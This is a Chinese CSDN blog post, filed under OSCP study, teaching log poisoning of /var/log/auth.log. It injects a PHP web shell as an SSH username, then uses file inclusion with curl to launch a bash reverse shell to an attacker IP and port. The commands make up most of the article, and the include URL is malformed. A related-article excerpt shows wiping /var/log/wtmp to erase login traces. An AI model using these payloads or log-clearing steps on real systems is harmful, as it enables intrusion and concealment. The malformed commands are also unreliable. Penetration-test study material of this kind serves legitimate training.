日志提权 /var/log/auth.log

最新推荐文章于 2023-11-21 13:18:18 发布
最新推荐文章于 2023-11-21 13:18:18 发布
阅读量3.2k 收藏 1
点赞数 1
分类专栏: oscp 文章标签: 运维 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57221101/article/details/123768200
版权

首先介绍一下这个日志,这个是ssh的登陆日志,会记录下ssh登录,sudo,su等命令的相关信息,这里需要重点提及的是,会记录下ssh登录时的用户名。

这个文件的权限一般是310所以不会被除root用户外的其他用户直接写入,一般也不能被除root组外的其他用户读取,但是一旦可以被读取,就可以在这上面下文章了 .

## 利用方法

之前说过auth日志会保存尝试ssh登录的用户名而不去校验这个用户名是否合法或在本地存在

那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行

操作如下

~~~shell
ssh '<?php system($_GET[cmd]);?>'@192.168.49.230 #实现命令
~~~

反弹shell

~~~shell
curl -is 'http://192.168.1.20/index.php?file=/var/log/auth.log/cmd=bash -i >& /dev/tcp/192.168.73.96/4444 0>&1'
~~~

更多利用方法请扩大你的脑洞

彤彤学安全
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
auth.log日志查看
weixin_34336526的博客
02-08 5448
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux入侵痕迹清理
小晓晓晓林的博客
02-20 6766
Linux入侵痕迹清理 环境:Centos7、Kali虚拟机等 清除登陆系统成功的记录 [root@localhost root]# echo > /var/log/wtmp//此文件默认打开时乱码,可查到ip等信息 [root@localhost root]#last//此时即查不到用户登录信息 清除之前能看到之前其他机器的登录信息 清除登陆系...
(转)ubuntu/var/log/下各个日志文件
anyangyu0343的博客
05-11 919
本文简单介绍ubuntu/var/log/下各个日志文件,方便出现错误的时候查询相应的log /var/log/alternatives.log-更新替代信息都记录在这个文件中 /var/log/apport.log-应用程序崩溃记录 /var/log/apt/-用apt-get安装卸载软件的信息 /var/log/auth.log -登录认证log /var/...
logsta-services:可视地将tcpdump和auth.log snort日志记录到logtalgia
04-19
Logsta服务 这个Python驱动的脚本将通过TCPDump监视网络连接,并通过auth.log监视Snort日志。 它将秘密日志转换为Apache / Logstalgia接受的格式,并将其保存到单独的日志文件中。 然后,该文件将被重定向到Logstalgia,并同步以可视格式显示日志。 没事吧? 享受! 检查extras目录中的原始文件。 (可能需要修改,并且可能不是最新的) 用法: 1. mv example_config.py to config.py 2. vim config.py, apply your configurations 3. touch snort.log 4. touch connections.log 5. sudo ./logstafeed.py 6. tail -F snort.log -F connections.log | logstalg
用shell脚本防ssh和vsftpd暴力破解的详解讲解
01-10
脚本需求如下:此SHELL脚本放在crontab计划任务里,每隔6小时(此时间根据实际情况来定义)就去读取/var/log/secure脚本,取出里面恶意猜测IP,如果单位时间内(一星期)的连接数是高于一个阀值,例如100(此阀值也可以根据实际情况来定义),则将其加进/etc/hosts.deny黑名单里,如果低于此阀值,则无视此IP。 /var/log/secure里认证失败信息如下: 代码如下:Nov 28 10:18:08 centos2 sshd[7556]: Connection closed by 222.216.30.109Nov 28 10:18:08 centos2 ss
Linux 日志系统
王兆镇的博客
09-09 2586
常见的日志 日志是一个系统管理员,一个运维人员,甚至是开发人员不可或缺的东西,系统用久了偶尔也会出现一些错误,我们需要日志来给系统排错,在一些网络应用服务不能正常工作的时候,我们需要用日志来做问题定位,日志还是过往时间的记录本,我们可以通过它知道我们是否被不明用户登录过等等。 在 Linux 中大部分的发行版都内置使用 syslog 系统日志,那么通过前期的课程我们了解到常见的日志一般存放在 /var/log 中,我们来看看其中有哪些日志 根据图中所显示的日志,我们可以根据服务对象粗略的将日志分为两类 系
Ubuntu 中登录相关的日志
Chocolate的博客
06-15 2115
本文整理了 Ubuntu 系统中常见的一些与登录相关的文件和命令。通过它们可以快速的查看当前用户的登录情况和所有用户登录登出的历史记录,并且可以查询到用户使用 root 权限执行的操作。这对我们维护系统的安全和用户的管理都非常有帮助。sparkdevsparkdev - 博客园本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。
【操作系统基础】Linux 中 /var/log/ 文件夹下通常有哪一些文件?分别的作用是什么?
Mercury_Lc的博客
07-31 1468
总之,Linux系统中的/var/log/文件夹下包含了大量的日志文件,这些文件记录了系统的各种活动和事件,对于系统管理员来说非常重要。除了上述提到的常见日志文件之外,/var/log/ 文件夹下还可能包含其他的日志文件,具体取决于系统的配置和使用情况。在Linux系统中,/var/log/ 文件夹通常包含了系统日志文件,这些文件记录了系统的各种活动和事件,以便管理员进行故障排除和监控。syslog:记录系统的各种事件和消息,包括系统服务的启动和停止、应用程序的错误信息等。
/var/log目录下的20个Linux日志文件功能详解
weixin_34413065的博客
02-16 681
如果愿意在Linux环境方面花费些时间,首先就应该知道日志文件的所在位置以及它们包含的内容。在系统运行正常的情况下学习了解这些不同的日志文件有助于你在遇到紧急情况时从容找出问题并加以解决。 以下介绍的是20个位于/var/log/ 目录之下的日志文件。其中一些只有特定版本采用,如dpkg.log只能在基于Debian的系统中看到。 /var/log/me...
loglog-server:Loglog 日志记录 Web 服务器
07-08
var server = require ( 'loglog-server' ) ; var auth = require ( 'http-auth' ) ; // It's necessary to have your datasource set before any requests // are fulfilled server . set ( 'source' , server . ...
log-notifier:日志的简单通知程序
06-03
var Notifier = require ( 'log-notifier' ) ; var notifier = null ; if ( mode === 'development' ) { notifier = new Notifier . Logger ( { prefix : 'hostname' , format : 'lll' } ) ; } else { if ( ...
详解nginx日志定时备份和删除
01-20
一旦开启了nginx日志功能,每天nginx都会生成一定大小的日志文件,如果系统稳定运行,没有任何问题,那么日志基本上不会去查看。但这些日志如不及时清理,日渐积累,对服务器的磁盘空间占用也将是比较恐怖的。为了...
AuthLogAttackMap:尾部varlogauth.log,对找到的IP进行地理定位,并将其显示在Web前端上
05-05
尾标/var/log/auth.log,对找到的IP进行地理定位,并将其显示在Web前端上。 用法 您将需要两个终端:一个用于观看auth.log,另一个用于向Web前端提供事件。 第一航站楼: python authLogTailer/ 第二终端: ...
Linux中 /var/log/ 中的各个文件的含义
See_you_Again_Le的博客
12-09 1595
Linux中 /var/log/ 中的各个文件的含义
Linux 设备日志相关
小灰灰的博客
07-06 692
此外,有些日志记录可能会通过特殊的机制,例如系统守护进程(syslogd)或日志管理工具(如systemd-journald),将日志信息实时写入磁盘,即使在设备重启后也能保留一部分日志数据。总而言之,日志服务的原理是通过生成、收集、传输、存储、索引、分析、监控和归档等步骤,对系统、应用程序或设备的运行信息进行管理和利用,以实现问题排查、性能监测、安全审计和故障分析等功能。日志分析和处理:通过使用日志分析工具、算法或规则,对日志数据进行处理和分析,以了解系统的运行状态、性能瓶颈、异常行为、安全事件等。
ELK stack实战之结合rsyslog分析系统日志(auth.log)
weixin_33801856的博客
10-08 401
打开微信扫一扫,关注微信公众号【数据与算法联盟】 转载请注明出处:http://blog.csdn.net/gamer_gyt 博主微博:http://weibo.com/234654758 Github:https://github.com/thinkgamer 写在前边的话 在之前的文章中我么谈到了EL...
麒麟(Kylin V10 SP1)系统auth.log日志重复保存,文件过大问题处理
niuwj666的博客
09-04 931
【代码】麒麟(Kylin V10 SP1)系统auth.log日志重复保存,文件过大问题处理。
Linux入侵日志排查】
最新发布
weixin_46356409的博客
11-21 807
不同的服务和应用程序可能会产生不同格式的日志记录。在分析日志时,请参考相关文档以了解日志格式和字段的具体含义。日志格式因应用程序而异,因此请参考相关文档以了解日志格式和字段的具体含义。在分析日志时,请参考相关文档以了解日志格式和字段的具体含义。Apache错误日志记录了Apache服务器的错误和诊断信息。MySQL错误日志记录了MySQL数据库服务器的错误和诊断信息。Nginx错误日志记录了Nginx服务器的错误和诊断信息。这些日志文件记录了系统和服务的一般信息和错误消息。等命令来过滤和分析日志文件。
利用/var/log/auth.log
06-12
除了使用inotify监控/etc/passwd文件外,也可以利用/var/log/auth.log日志文件来实时获取新增用户。auth.log文件记录了系统的用户认证和授权信息,包括用户登录、密码修改、sudo使用等等。 具体实现步骤如下: 1. 使用系统函数open()打开/var/log/auth.log日志文件,并使用lseek()将文件指针定位到文件末尾。 2. 使用系统函数read()读取文件内容,并处理新增用户的日志信息。 3. 在处理日志信息时,可以使用正则表达式匹配新增用户的信息,从而得知新增用户的信息。 下面是一个简单的示例代码: ``` #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <regex.h> #define BUF_SIZE 1024 int main(int argc, char **argv) { int fd, n; char buf[BUF_SIZE]; off_t off; regex_t reg; regmatch_t match[2]; fd = open("/var/log/auth.log", O_RDONLY); if (fd < 0) { perror("open"); exit(EXIT_FAILURE); } off = lseek(fd, 0, SEEK_END); while (1) { n = read(fd, buf, BUF_SIZE); if (n < 0) { perror("read"); exit(EXIT_FAILURE); } if (n == 0) { usleep(1000000); // wait for new data continue; } if (regcomp(&reg, "useradd: new user: name=([^,]+)", REG_EXTENDED) != 0) { perror("regcomp"); exit(EXIT_FAILURE); } if (regexec(&reg, buf, 2, match, 0) == 0) { char *name = strndup(&buf[match[1].rm_so], match[1].rm_eo - match[1].rm_so); printf("New user added: %s\n", name); free(name); } regfree(&reg); off += n; lseek(fd, off, SEEK_SET); } close(fd); return 0; } ``` 这段代码可以实时监控/var/log/auth.log日志文件的新增用户信息,并输出新增用户的用户名。需要注意的是,我们使用正则表达式匹配日志信息时,需要使用regcomp()函数编译正则表达式,并使用regexec()函数执行正则表达式匹配。同时,为了避免重复输出新增用户信息,我们在每次读取日志文件内容时,将文件指针定位到文件末尾,从而避免重复处理已经处理过的日志信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值